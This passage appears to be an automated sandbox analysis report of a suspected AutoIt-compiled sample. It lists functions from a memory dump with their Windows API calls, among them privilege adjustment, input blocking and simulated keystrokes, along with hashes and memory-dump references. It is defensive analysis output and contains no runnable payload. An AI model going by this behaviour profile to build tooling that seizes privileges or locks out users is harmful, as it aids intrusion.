                                                                                                                                                                                                                                                                  • Part of subcall function 00A4014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00A409F5
                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A8205A
                                                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A82087
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A82097
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 577356006-0
                                                                                                                                                                                                                                                                • Opcode ID: 2713e211cabdfae5d96f4adf51584e27d63a340394cd5a414bf86505c2a6977b
                                                                                                                                                                                                                                                                • Instruction ID: 9415481a9307775b0a2a349c35d0fe36ee3f3b4f79d3ecdaa194ec6612edb1d0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2713e211cabdfae5d96f4adf51584e27d63a340394cd5a414bf86505c2a6977b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3111BFB1400204AFD718AF54DC86E6BB7B8FB44710B20852EE44657251EB70BC42CB20
                                                                                                                                                                                                                                                                Function 00A45058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,00A4502E,?,00AE98D8,0000000C,00A45185,?,00000002,00000000), ref: 00A45079
                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00A4502E,?,00AE98D8,0000000C,00A45185,?,00000002,00000000), ref: 00A45080
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00A45092
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                • Opcode ID: 8b99fb62b788cdc058ca57307a69720aa7d0508330b96391979551af599f4981
                                                                                                                                                                                                                                                                • Instruction ID: cf1302d7bb78a06ffe2f4e929044759aa751ef1b7909f5696371461d358c0f62
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b99fb62b788cdc058ca57307a69720aa7d0508330b96391979551af599f4981
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAE0B63A400548AFCF21AFA4DE09E583BA9EB91385F154514F8499A533EB35DD42CBD0
                                                                                                                                                                                                                                                                Function 00A7E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 00A7E664
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: NameUser
                                                                                                                                                                                                                                                                • String ID: X64
                                                                                                                                                                                                                                                                • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                • Opcode ID: 7d9388aa464675236acfe7f76c5da990091af2366f64e6ba51da1554bd33ab80
                                                                                                                                                                                                                                                                • Instruction ID: 0e802d49b660679d4f595f88232f86560337f664f79fb5be9f8530f067883ba4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d9388aa464675236acfe7f76c5da990091af2366f64e6ba51da1554bd33ab80
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CD0C9B480111DEACB80DB90EC88DDA73BCBB08304F104691F106E2041D73095498B10
                                                                                                                                                                                                                                                                Function 00A941FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00AA52EE,?,?,00000035,?), ref: 00A94229
                                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00AA52EE,?,?,00000035,?), ref: 00A94239
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                • Opcode ID: 0ca360a49f60f5c8c9baf4557089ccfa9e1de6fdfbc745a663f912daff46219e
                                                                                                                                                                                                                                                                • Instruction ID: 464266f617c7b88fea1d8a55e27bfc2e81a7ac4a50bf5c3830b1325edf8d84ac
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ca360a49f60f5c8c9baf4557089ccfa9e1de6fdfbc745a663f912daff46219e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82F0A0307002256AEB2057A5AC4DFEB3AADFF89B61F000275F505D2192DA70990187B0
                                                                                                                                                                                                                                                                Function 00A8BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00A8BC24
                                                                                                                                                                                                                                                                • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00A8BC37
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                • Opcode ID: 1af318aad3ada99795b475ba1247fefe1e34e544a518fdedba77bd4804e0a06a
                                                                                                                                                                                                                                                                • Instruction ID: 6ae08abc54700ab39fc3e59328e078a5e590c60ebc0752b9eba33d4d3feeae91
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1af318aad3ada99795b475ba1247fefe1e34e544a518fdedba77bd4804e0a06a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27F06D7080024DABDB01DFA0C805BFE7BB0FF08309F008419F951A51A2D7798201DFA4
                                                                                                                                                                                                                                                                Function 00A81A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A81B48), ref: 00A81A20
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00A81B48), ref: 00A81A35
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 81990902-0
                                                                                                                                                                                                                                                                • Opcode ID: 3964c821dacc598b2aa1d0123f192a89415fadf3a7723b2423ef0628852308fb
                                                                                                                                                                                                                                                                • Instruction ID: 30502feb305c8162f7ce816d6b8fcdd9f099641c876034cfed8f32b530d196f5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3964c821dacc598b2aa1d0123f192a89415fadf3a7723b2423ef0628852308fb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CE01A72004610AEE7252B54EC05E72B7A9EB04320F148A2DB59680471EB726C91EB10
                                                                                                                                                                                                                                                                Function 00A9F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • BlockInput.USER32(00000001), ref: 00A9F51A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BlockInput
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                • Opcode ID: 2599f370a2fa3aec189ecbca3d0c49fc33c253509cd3ff74ada5e1a4dbe1d6d3
                                                                                                                                                                                                                                                                • Instruction ID: 8607c90803a7efcc0d6b37d68df1a216910a683e92432c91d0eba9c2ee76ad07
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2599f370a2fa3aec189ecbca3d0c49fc33c253509cd3ff74ada5e1a4dbe1d6d3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47E048313102145FCB10EF6DE44495AF7E8AFA4771F018425F84AC7351D670F9418B90
                                                                                                                                                                                                                                                                Function 00A8EC9E Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00A8ECC7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: mouse_event
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2434400541-0
                                                                                                                                                                                                                                                                • Opcode ID: aecf13d0200e3f439cc7ffac58f2ca7f5a78136001a9d9f6f1d92ab4c812eeca
                                                                                                                                                                                                                                                                • Instruction ID: df99d8f2d97204bdd4fe19834379a8ec6c7734960437449f285420d2897efca8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aecf13d0200e3f439cc7ffac58f2ca7f5a78136001a9d9f6f1d92ab4c812eeca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0D05EF6998200F8EA2DFB398E2FB762509E781751F880749B202C96D9E5D19900A261
                                                                                                                                                                                                                                                                Function 00A40D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00A4075E), ref: 00A40D4A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                • Opcode ID: 0366da583d40008dd1984f283066b74cbd383d6c70ec744c7980b3d23c401f91
                                                                                                                                                                                                                                                                • Instruction ID: 93131beb3ba99f8da92ef253e0a1157372ea1131bae4a9c8f5b79678d1579313
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0366da583d40008dd1984f283066b74cbd383d6c70ec744c7980b3d23c401f91
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                Function 00AA353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AA358D
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AA35A0
                                                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 00AA35AF
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00AA35CA
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AA35D1
                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00AA3700
                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00AA370E
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA3755
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00AA3761
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00AA379D
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA37BF
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA37D2
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA37DD
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00AA37E6
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA37F5
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00AA37FE
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA3805
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00AA3810
                                                                                                                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA3822
                                                                                                                                                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00AC0C04,00000000), ref: 00AA3838
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00AA3848
                                                                                                                                                                                                                                                                • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00AA386E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00AA388D
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA38AF
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AA3A9C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                • Opcode ID: a57c76332c6c78cedbaf0cfffd09411a90dcc628f3f02e9b802662272bfad967
                                                                                                                                                                                                                                                                • Instruction ID: a7bc3a5a22501144e0266fe1ec44b8812b30648c5c98f0467824eb17f9c71bba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a57c76332c6c78cedbaf0cfffd09411a90dcc628f3f02e9b802662272bfad967
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9028F72900215AFDB14DFA8DD49EAE7BB9FF49310F048218F915AB2A1DB74AD41CB60
                                                                                                                                                                                                                                                                Function 00AB7B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00AB7B67
                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00AB7B98
                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00AB7BA4
                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,000000FF), ref: 00AB7BBE
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00AB7BCD
                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00AB7BF8
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 00AB7C00
                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 00AB7C07
                                                                                                                                                                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 00AB7C16
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00AB7C1D
                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00AB7C68
                                                                                                                                                                                                                                                                • FillRect.USER32(?,?,?), ref: 00AB7C9A
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AB7CBC
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: GetSysColor.USER32(00000012), ref: 00AB7E5B
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: SetTextColor.GDI32(?,00AB7B2D), ref: 00AB7E5F
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: GetSysColorBrush.USER32(0000000F), ref: 00AB7E75
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: GetSysColor.USER32(0000000F), ref: 00AB7E80
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: GetSysColor.USER32(00000011), ref: 00AB7E9D
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AB7EAB
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: SelectObject.GDI32(?,00000000), ref: 00AB7EBC
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: SetBkColor.GDI32(?,?), ref: 00AB7EC5
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: SelectObject.GDI32(?,?), ref: 00AB7ED2
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00AB7EF1
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AB7F08
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB7E22: GetWindowLongW.USER32(?,000000F0), ref: 00AB7F15
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
